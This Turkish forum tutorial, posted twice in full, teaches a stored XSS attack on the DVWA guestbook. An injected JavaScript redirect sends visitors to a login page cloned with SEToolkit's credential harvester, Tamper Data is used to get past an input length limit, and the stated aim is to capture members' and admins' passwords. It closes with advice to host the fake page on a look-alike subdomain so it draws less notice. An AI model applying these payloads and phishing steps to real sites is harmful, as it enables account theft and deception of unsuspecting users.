XSS Stored Açığı
XSS Stored Açığı (Setoolkit İle)
Merhabalar,
Eski ve basit olmasına karşın güçlü bir tehlike arz eden bir açık türümüz var; XSS
Ve XSS açığının veri tabanına işlenmesine olanak sağlayan açık türü ise: XSS StoredÖrneğin elimizde bir web sayfası var ve biz buraya gerekli javascript kodlarını enjekte ettiğimizde;
385191 - XSS Stored Açığı
Bize çıktısı şu olacaktır;
385192 - XSS Stored Açığı
Yaptığımız işlem gayet basit, ekrana alert mesajını verdirdik.
Kod: [Gösterim]
<script>alert("ExitStars Was Here");</script>
Bu gördüklerimiz basit bir XSS örneği idi. Bu kodlar veri tabanına kayıt olmaz, ancak XSS açığının bir türü var ki, eklenen kodlar veri tabanına kaydolur ve her girişimizde o kodlar çalışır. Buna XSS Stored denir. Basit bir yönlendirme kodu eklenerek site index sayfasına yönlendirilebilir. Ancak bizim amacımız siteyi index atıp hack etmek değil, üye ve yönetici bilgilerini almaksa eğer farklı bir yöntem izlenmelidir.
Diyelim ki bir ziyaretçi defterin de xss stored açığı var. Aynı zamanda bu web sayfasının bir üye/yönetici giriş ekranı var. O zaman bir senaryo oluşturalım.
- Yönetici / Üye giriş ekranı klonlanır.
- Açığın olduğu yere javascript yönlendirme kodu enjekte edilir.
- Yönlendirme klonlanmış giriş sayfasına yapılır.
- Sosyal Mühendislik yolu ile üyelerin yorum yapması istenilir
- Ve bilgiler bu yol ile elimize geçer.
Evet, yapacaklarımızın listesi hazır. Hemen operasyon aşamasına geçelim, ben örnek olarak ****sploitable kullanacağım. İçerisinde ki DVWA uygulamasında XSS Stored açığı mevcut.
Not: ****sploitable kullanacak arkadaşlar sisteme giriş yaptıktan sonra (Kullanıcı Adı: admin, Şifre: password) DVWA Security kısmından high (zor) seçeneğini low (kolay) olarak değiştirmelidirler. Yoksa kodlar çalışmayacaktır.
Gerekli Uygulamalar;
- Setoolkit
- Tamper Data
Hemen bir deneme yapıyoruz;
385193 - XSS Stored Açığı
385194 - XSS Stored Açığı
Evet açık mevcut, demek ki buraya yönlendirme yapmak mümkün. O zaman bu scriptin giriş sayfasını klonlayalım. Bunun için setoolkit aracı biçilmiş kaftandır diyebiliriz. Kali linux üzerinde terminale setoolkit diyerek uygulamayı başlatabilirsiniz. Daha sonra sırası ile şu adımları izleyin
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
Bu adımları takip ettikten sonra bize IP Address for the POST back in Harvester/Tabnabbing: diye bir soru soracak. Bizden istediği klonlanacak sayfanın hangi siteye göre hazırlanacağı dır. Ben yerel sunucu üzerinde çalışacağım için kendi yerel ip adresimi yazacağım, siz dosyaları nereye yükleyecek iseniz (hangi adrese yönlendirecek iseniz) oranın ismini yazın.Daha sonra bizden Enter the url to clone: diyerek klonlanacak sayfayı isteyecektir. Açığın bulunduğu web sayfasında ki giriş panelinin ismini yazıyoruz.
385195 - XSS Stored Açığı
Gördüğünüz gibi bize /var/www içerisine klonladığını söylüyor. Buradaki tüm dosyaları, hangi sayfaya yönlendirecek iseniz oraya aktarıyoruz. Benim ki yerel sunucu üzerinde, orada bırakıyorum. Şimdi sıra yönlendirme kodunu enjekte etmekte. Tekrar ziyaretçi defterine dönüyoruz.
Kodu eklerken ufak bir sıkıntı ile karşılaşıyoruz, karakter sınırlaması var. Tüm kodu ekleyemiyoruz.
Kod: [Gösterim]
<script>window.locati.on="http://yonendirilecekadres</script>
yonlendirilecek adres kısmına, klonlanmış scripti yüklediğimiz siteyi yazıyoruz.
385196 - XSS Stored Açığı
Görüldüğü gibi kodun bir kısmı (</ dan sonrası) karakter sınırlaması nedeni ile yazılmıyor. O zaman biz de Tamper Data eklentisi ile yükleriz. Mozilla / araçlar sekmesinden Tamper Data’yı açıyoruz ve Start Tamper diyoruz. Hemen ardından Sign Guestbook butonuna tıklıyoruz. Gelen uyarıya tamper diyoruz ve ekranımız açılıyor.
385197 - XSS Stored Açığı
mtxMessage kısmına kodlarımızın kalanını yazıyoruz. en son </ kısmını yazmıştık, devamı script> olmalı. > karakterinin kodlamada ki karşılığı > dir çünkü. Ok diyoruz ve kaydı onaylıyoruz. Sonuç olarak onaylanır onaylanmaz bizi giriş sayfasına yönlendirdi. Eğer url yapısına dikkat etmezse yine giriş yapması gerektiğini düşünüp giriş yapacaktır ve giriş bilgileri de, scriptin kurulu olduğu dizine kaydedilecektir. Benim localhost üzerinde kayıtlı olduğu için /var/www dizinini içerisinde bulunuyor. Giriş yapıp kontrol edelim.
385198 - XSS Stored Açığı
Görüldüğü gibi, ben giriş yapınca bilgiler de scriptin kurulu olduğu dizinde ki bir txt belgesine eklenmiş oldu. Basit bir sosyal mühendislik, iyi bir taktik ile daha bir çok bilgiye erişilebilir. Setoolkit aracının hünerlerini ileri ki zamanlarda anlatmaya devam edeceğim, beklemede kalın.
Not: Örneğin http://exitstars.com/forum/login.php sayfası klonlanacak ise ve sizin elinizde bluedream.com adlı bir site varsa şöyle bir sub domain açabilirsiniz ve dosyaları oraya kopyalayabilirsiniz, daha az dikakt çekecektir.
http://exitstars.com.bluedream.com/forum/login.php
sizin için daha faydalı olucaktır.
XSS Stored Açığı (Setoolkit İle)
Merhabalar,
Eski ve basit olmasına karşın güçlü bir tehlike arz eden bir açık türümüz var; XSS
Ve XSS açığının veri tabanına işlenmesine olanak sağlayan açık türü ise: XSS StoredÖrneğin elimizde bir web sayfası var ve biz buraya gerekli javascript kodlarını enjekte ettiğimizde;
385191 - XSS Stored Açığı
Bize çıktısı şu olacaktır;
385192 - XSS Stored Açığı
Yaptığımız işlem gayet basit, ekrana alert mesajını verdirdik.
Kod: [Gösterim]
<script>alert("ExitStars Was Here");</script>
Bu gördüklerimiz basit bir XSS örneği idi. Bu kodlar veri tabanına kayıt olmaz, ancak XSS açığının bir türü var ki, eklenen kodlar veri tabanına kaydolur ve her girişimizde o kodlar çalışır. Buna XSS Stored denir. Basit bir yönlendirme kodu eklenerek site index sayfasına yönlendirilebilir. Ancak bizim amacımız siteyi index atıp hack etmek değil, üye ve yönetici bilgilerini almaksa eğer farklı bir yöntem izlenmelidir.
Diyelim ki bir ziyaretçi defterin de xss stored açığı var. Aynı zamanda bu web sayfasının bir üye/yönetici giriş ekranı var. O zaman bir senaryo oluşturalım.
- Yönetici / Üye giriş ekranı klonlanır.
- Açığın olduğu yere javascript yönlendirme kodu enjekte edilir.
- Yönlendirme klonlanmış giriş sayfasına yapılır.
- Sosyal Mühendislik yolu ile üyelerin yorum yapması istenilir
- Ve bilgiler bu yol ile elimize geçer.
Evet, yapacaklarımızın listesi hazır. Hemen operasyon aşamasına geçelim, ben örnek olarak ****sploitable kullanacağım. İçerisinde ki DVWA uygulamasında XSS Stored açığı mevcut.
Not: ****sploitable kullanacak arkadaşlar sisteme giriş yaptıktan sonra (Kullanıcı Adı: admin, Şifre: password) DVWA Security kısmından high (zor) seçeneğini low (kolay) olarak değiştirmelidirler. Yoksa kodlar çalışmayacaktır.
Gerekli Uygulamalar;
- Setoolkit
- Tamper Data
Hemen bir deneme yapıyoruz;
385193 - XSS Stored Açığı
385194 - XSS Stored Açığı
Evet açık mevcut, demek ki buraya yönlendirme yapmak mümkün. O zaman bu scriptin giriş sayfasını klonlayalım. Bunun için setoolkit aracı biçilmiş kaftandır diyebiliriz. Kali linux üzerinde terminale setoolkit diyerek uygulamayı başlatabilirsiniz. Daha sonra sırası ile şu adımları izleyin
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
Bu adımları takip ettikten sonra bize IP Address for the POST back in Harvester/Tabnabbing: diye bir soru soracak. Bizden istediği klonlanacak sayfanın hangi siteye göre hazırlanacağı dır. Ben yerel sunucu üzerinde çalışacağım için kendi yerel ip adresimi yazacağım, siz dosyaları nereye yükleyecek iseniz (hangi adrese yönlendirecek iseniz) oranın ismini yazın.Daha sonra bizden Enter the url to clone: diyerek klonlanacak sayfayı isteyecektir. Açığın bulunduğu web sayfasında ki giriş panelinin ismini yazıyoruz.
385195 - XSS Stored Açığı
Gördüğünüz gibi bize /var/www içerisine klonladığını söylüyor. Buradaki tüm dosyaları, hangi sayfaya yönlendirecek iseniz oraya aktarıyoruz. Benim ki yerel sunucu üzerinde, orada bırakıyorum. Şimdi sıra yönlendirme kodunu enjekte etmekte. Tekrar ziyaretçi defterine dönüyoruz.
Kodu eklerken ufak bir sıkıntı ile karşılaşıyoruz, karakter sınırlaması var. Tüm kodu ekleyemiyoruz.
Kod: [Gösterim]
<script>window.locati.on="http://yonendirilecekadres</script>
yonlendirilecek adres kısmına, klonlanmış scripti yüklediğimiz siteyi yazıyoruz.
385196 - XSS Stored Açığı
Görüldüğü gibi kodun bir kısmı (</ dan sonrası) karakter sınırlaması nedeni ile yazılmıyor. O zaman biz de Tamper Data eklentisi ile yükleriz. Mozilla / araçlar sekmesinden Tamper Data’yı açıyoruz ve Start Tamper diyoruz. Hemen ardından Sign Guestbook butonuna tıklıyoruz. Gelen uyarıya tamper diyoruz ve ekranımız açılıyor.
385197 - XSS Stored Açığı
mtxMessage kısmına kodlarımızın kalanını yazıyoruz. en son </ kısmını yazmıştık, devamı script> olmalı. > karakterinin kodlamada ki karşılığı > dir çünkü. Ok diyoruz ve kaydı onaylıyoruz. Sonuç olarak onaylanır onaylanmaz bizi giriş sayfasına yönlendirdi. Eğer url yapısına dikkat etmezse yine giriş yapması gerektiğini düşünüp giriş yapacaktır ve giriş bilgileri de, scriptin kurulu olduğu dizine kaydedilecektir. Benim localhost üzerinde kayıtlı olduğu için /var/www dizinini içerisinde bulunuyor. Giriş yapıp kontrol edelim.
385198 - XSS Stored Açığı
Görüldüğü gibi, ben giriş yapınca bilgiler de scriptin kurulu olduğu dizinde ki bir txt belgesine eklenmiş oldu. Basit bir sosyal mühendislik, iyi bir taktik ile daha bir çok bilgiye erişilebilir. Setoolkit aracının hünerlerini ileri ki zamanlarda anlatmaya devam edeceğim, beklemede kalın.
Not: Örneğin http://exitstars.com/forum/login.php sayfası klonlanacak ise ve sizin elinizde bluedream.com adlı bir site varsa şöyle bir sub domain açabilirsiniz ve dosyaları oraya kopyalayabilirsiniz, daha az dikakt çekecektir.
http://exitstars.com.bluedream.com/forum/login.php
sizin için daha faydalı olucaktır.